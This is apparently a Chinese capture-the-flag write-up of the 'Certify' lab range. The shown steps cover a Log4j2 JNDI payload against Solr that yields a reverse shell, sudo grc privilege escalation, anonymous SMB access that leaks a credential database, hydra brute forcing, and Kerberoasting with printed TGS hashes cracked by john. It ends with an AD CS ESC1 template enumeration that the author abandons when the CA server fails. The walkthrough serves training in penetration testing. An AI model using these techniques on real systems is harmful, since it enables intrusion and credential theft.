靶标介绍
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
solr log4j2 RCE
39.98.115.206:80 open
39.98.115.206:8983 open
39.98.115.206:22 open80端口是nginx默认界面,那就看8983
是一个solr面板,存在log4j2
https://github.com/vulhub/vulhub/blob/master/log4j/CVE-2021-44228/README.zh-cn.md
搜索找到poc
solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}root@VM-4-13-ubuntu:~# nc -lnvp 4567
Listening on 0.0.0.0 4567
Connection received on 39.98.121.108 33364
bash: cannot set terminal process group (10827): Inappropriate ioctl for device
bash: no job control in this shell
solr@ubuntu:/opt/solr/server$ id
id
uid=111(solr) gid=122(solr) groups=122(solr)提下权
solr@ubuntu:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/grc
solr@ubuntu:/opt/solr/server$ sudo grc --pty /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)root@ubuntu:~/flag# cat flag01.txt
██████ ██ ██ ████
██░░░░██ ░██ ░░ ░██░ ██ ██
██ ░░ █████ ██████ ██████ ██ ██████ ░░██ ██
░██ ██░░░██░░██░░█░░░██░ ░██░░░██░ ░░███
░██ ░███████ ░██ ░ ░██ ░██ ░██ ░██
░░██ ██░██░░░░ ░██ ░██ ░██ ░██ ██
░░██████ ░░██████░███ ░░██ ░██ ░██ ██
░░░░░░ ░░░░░░ ░░░ ░░ ░░ ░░ ░░
Easy right?
Maybe you should dig into my core domain network.
flag01: flag{177f2bc3-0f0b-4fba-82dc-56081d0fd7fc}smb免密登录
172.22.9.19 solr
172.22.9.7 DC XIAORANG\XIAORANG-DC [+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
172.22.9.26 XIAORANG\DESKTOP-CBKTVMO
172.22.9.47 WORKGROUP\FILESERVER 文件服务器上有smb共享
root@kali2 [~] ➜ proxychains4 smbclient --no-pass -L //172.22.9.47 [19:36:29]
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 101.43.121.110:7002 ... 172.22.9.47:445 ... OK
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
fileshare Disk bill share
IPC$ IPC IPC Service (fileserver server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain ... 101.43.121.110:7002 ... 172.22.9.47:139 ... OK
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FILESERVERroot@kali2 [~] ➜ proxychains4 -q smbclient -N //172.22.9.47/fileshare [19:39:48]
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 13 16:12:10 2022
.. D 0 Wed Jul 13 12:35:09 2022
personnel.db A 61440 Wed Jul 13 15:46:55 2022
secret D 0 Sun Feb 9 18:46:48 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 16:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 16:08:14 2022
41152812 blocks of size 1024. 36033796 blocks available
smb: \> cd secret
smb: \secret\> dir
. D 0 Sun Feb 9 18:46:48 2025
.. D 0 Wed Jul 13 16:12:10 2022
flag02.txt N 659 Sun Feb 9 18:46:48 2025root@kali2 [~] ➜ cat flag02.txt [19:40:30]
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{2dd009d8-1ba6-4ac7-a7f7-8d4d4a38a826}
Yes, you have enumerated smb. But do you know what an SPN is?AD CS ESC1
提示spn,应该要kerberoasting攻击,但是得需要拿到一组账户密码
SMB下面还有一个persion.db文件,里面有用户名密码
root@kali2 [~] ➜ sqlite3 personnel.db [19:47:51]
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .tables
xr_members xr_salary xr_users
sqlite> select * from xr_users;
1|admin|admin
2|******|i9XDE02pLVf
3|******|6N70jt2K9sV
4|******|fiAzGwEMgTY
sqlite> select * from xr_members;
1|huangmin|1|26|15220647319|huangmin@xiaorang.lab
2|zhangrong|1|36|13073815024|zhangrong@xiaorang.lab
3|liying|1|29|13126874319|liying@xiaorang.lab
4|zhaoli|1|44|13075613024|zhaoli@xiaorang.lab
5|zhangyan|0|35|15254139260|zhangyan@xiaorang.lab
6|zhoujing|1|32|15123481906|zhoujing@xiaorang.lab
7|liuying|1|24|13078310649|liuying@xiaorang.lab
..
..可以用用户名和密码做爆破
root@kali2 [/tmp] ➜ cat aaa | awk -F '|' '{print $2}' > user.txt
root@kali2 [/tmp] ➜ cat bbb | awk -F '|' '{print $3}' >pass.txt root@kali2 [/tmp] ➜ proxychains4 -q hydra -L user.txt -P pass.txt 172.22.9.26 smb -t
[445][smb] host: 172.22.9.26 login: zhangjian password: i9XDE02pLVf
[445][smb] host: 172.22.9.26 login: liupeng password: fiAzGwEMgTY进行kerberoasting攻击
root@kali2 [/tmp] ➜ proxychains4 -q GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf [19:56:35]
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
------------------------------------- -------- -------- -------------------------- ---------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>
$krb5tgs$23$*zhangxia$XIAORANG.LAB$WWW/desktop-cbktvmo.xiaorang.lab/IIS*$ecded3cd07ccc3c31c0d698da33cb8b9$74e137e024517f28b99cab3c4cce3a1ca08926b6aa091030200baf9a9682217b06e50e62e16df39b577e8c7e81cebc2b48dc86d6eae2bfe77d3b9ce09ab318a1e49846e34a25ded83d6640680d64ba3029cc1c1783af09e2f92e9a8a84260255c1360a707de9cf87c0cde8eb3b018e50ba6707ab9f60a27b1817fe2919fdd04d1e2c4b03395893002b7c205001c0d9f9f404dfff62ce54d9d21e97b9e689a11bfa2b6d62227a2a0014945aacfa81ae3e9ceb42d2f47d75c0af55f3877cc41174bfa7a4843a8ccc6628dd7f56cc71862403ff412c60d05d39e19890dbb08eb077e2e6deb93a669716807d5f7cacc99ce25a7bda91405b27f93ab2180646d0cb615121876d93230737cae42c92067e3de1b7f0ba9dffe024be56398454929c4144eb58c2b5c7a7c914b22b754d7037dbe56c1bb7b4d8ba004646ba3a334cb39064cdc702cd1c099844363868e59b0492fce48dff184fc32efc51f64f81248d8a8ba38dc9c9d9df3c9a6e524da0e8dd1d87dbc6ccf50b6fa27c6c5fd7f58e7148a4820ebe3367431c504abf74337587f0189b5ba58096435238b1dd240a9433e6843d10ad36f05a9bfc9558b38209fa18b50ef7e532226940c23c8a82d2b2440c24704611d9ad63471f0c867d6f65f9c5ae87b7de5c6cbddda52ba30c304780da12080cde834709430c3e6b8c946ff4f5a0efce60eb592effa55e857049292add75185b358ca4da6c29fbccb0ba5b7366e5f72a9897d7433649329c8338cf7f74c8c859c73992840e097a92bf3c94fbba31a55d490e35d4fbcc4e297c9bdded6f711bc980b47c309ec3a6f072c7e19c10a59bae3168a3ac0aad1703169f4512abc1b007787d3b90bcec511dfcf3ee74df4c85a7cb306f20ffd1c13582bc4a448cbca888cb8982c9ce618092efd1b8565e63e5168807013efa11fc796b627d8d894d6fa378834327fd115728ddb04fbccfc59c76765722b1e1b60e092a906b64e3dd9ed6b80aada51a0349df9e402564b2e90d8fe111535d35b3bde819f55b8eda5982570537bd01abaa749c8b5f3f2967fe4b83b0b4f46c203628159e7815e544250f3713cc32e4e39a4765692d10d44fe51b4905166b1026efb2a440cd09f784426b73d4c18e7a41cfe9ca36fba8ce63bba8931b326167a2f4d788fd4fb4c0c708d573e1a0b357694dd991f08b6b57be119704e95bc9b3006e88bea29264763f48ef29b3a1dec1d81ad108f582eadbd3254496e962c1d00e0f672eaa4098b155f12284d1a6053e493f4eba34e4b37d9aaca350399d6f023b96597bdbefdd97babf8ddfcd491ccdd1bf1a1f3ff0154d666fe16565a6fd43ad5d24a2e102c4e11d4b8f983e48ccc10b6111adc477cea7cc7a93de2c7b71fcf267062b3353567b1f9e6f4765c10da4fb8c5304eada4689e4393eaa5ba7edb813259bbb54c00363a0526c9a6f2eac76639f0447666ba6a9aae265bfef67ded98b64367e1bfa6c80d993317e75ea99d3a646a31847fb4250
$krb5tgs$23$*chenchen$XIAORANG.LAB$TERMSERV/win2016.xiaorang.lab*$a76b2e39a45b6e4f99dc7f47d64f9c6b$21bf4bd4b95faf39c29d4839d748341a9999a9f3f78f59a65df4a8f628fd107530b33eb10bd12efa2e424f03eafe298b1b6f258e7e0a444e671c444c814015880d38a5d4fab6cdd5c0a1b367ca5d6f5b15eea507110a8c0d86a1d34aaf1f6d778de95eea3ff9b0f728d43c5389732228da0c8bbe106c0b0bc314e7bd527d2f070f1955af7cb3e4a95f76dd7d176a7db6787cdfd37ec9bfc2bde03ee2c3d91da42c673dbfba495146843b13fc6fa4ed85447e1a653047dd5da5b9897552a89439c8aeceda3d444c208d5c35dd8002b113966f38b20bbc15c624322350b110abe489f0525f82a9681053d8cd9289ff0ded94caf48312301771b86ca2cb665594e4879021d2859d7f6f0fb4e135d9f340a69c294c1390beecaa75ceb9025bc9b4d5df2ea8b78406449875aa4c5e73984875c70d95cfcbe5cf60f95243116a368cd0f0446f06c652065cf0644e401ed2c9d4e430c29c9af02c49aaa29d31b1ed72dc4a8ab8fa6867a82ff6bca8eb441977e8d22f2488988d8a0be47db9f3fdd2a198516975da488b367b48147530cb7e6861b07bf23b29b65f6fe474e5cceaab9971e1953fa21ea00dd07494897f8ee39cd22548853b42deaae5d4ccddaa8ff2c2053bf33785122d83ec0267de8dc9fbd6f9f07c5cb76f27a4fa2bbb68e12b907413eb2ee518c3f526d035d089304ff8f32c69b872e8742e2c3d248ce4432b319614588c65abf0601c8a79cfd418c221a8028dee84b695620a7f463ba6bd935e7fdbfe8e2380de4132af43f84c08410d17bee61cfbdc8705ab035af115fd75193c492fc59d6eb0e0d1f4ef0d02dd25cb032f9e22d967d2787951f5add0eddb99384a51c133f5f5ac494fa77f351cb9e203630adf6ccc981e12f33388c39083a44fe84a92bca9090d101419e18d8135c80d899438b8c088f411cf6590c294c6332ee59ad7d8838e28a44b3897d61560ee4ea8d1e6b95d26af7efbf95ca1c72fcbd3de197986b8094e75a117178cfa36325c101cb892190105e6e58ec49e09589014259449f56dadf12409849b51ac03c9faf3cf468703805859a743e19fa483fffa4647defb01d980f01dc9cd2adf8c1cd44edf130eda738df7d36da0a5ef729d58308f1bfbec5b1215ea16ce3ac4f50699dc3207fed4a566b2243db32d542f04a215de04bf04b16c51d9adc9db94fbc36e3d46e9a7d702425d04704a4d8f1c5bd10fe814aef088889a72f4c2fd761f68062baba0f04c7ddbb404b9a7df715fcd8e3045e3a9730f2e4a2dca46e51bcaf8669ec42180dcecc8939112f55c43b4b35a44e9b99e5f4743f58a23615fd6941625c873a4b847db0ab61ccce7def6a334f7e50a4a4998a903e699aa275923b4d670014f0a14287d04482444f920234eaf0b50847421f0f3f9e489f76bfa4d35486d0e503b754140460cc9321a70333fb7de75e47ce0e069f75037b97c8df47fbbda2346b2626406bc1901c1bae83a8a96fad58a74d7484c30f9b6e18bbd7a0940拿到两个用户哈希
root@kali2 [/tmp] ➜ john aaa --wordlist=/usr/share/wordlists/rockyou.txt [20:01:04]
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: invalid UTF-8 seen reading ~/.john/john.pot
Press 'q' or Ctrl-C to abort, almost any other key for status
MyPass2@@6 (?)
@Passw0rd@ (?)
2g 0:00:00:26 DONE (2025-02-09 20:01) 0.07665g/s 440314p/s 854663c/s 854663C/s @S95008..@PPL3B0TT0M
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 可以跑出来 xiaorang.lab\zhangxia:MyPass2@@6 xiaorang.lab\chenchen:@Passw0rd@
chenchen用户可以rdp登录
题目标注AD CS,所以用Certify查找易受攻击的证书板块
https://github.com/GhostPack/Certify
c:\Users\chenchen\Desktop>Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'
[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'
Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Certify completed in 00:00:09.8863071XR Manager可以被攻击,利用此模板申请证书冒充管理员
然后一直报错,才知道CA服务器172.22.9.13没有起来,重启5次都起不来,嘻嘻,下班。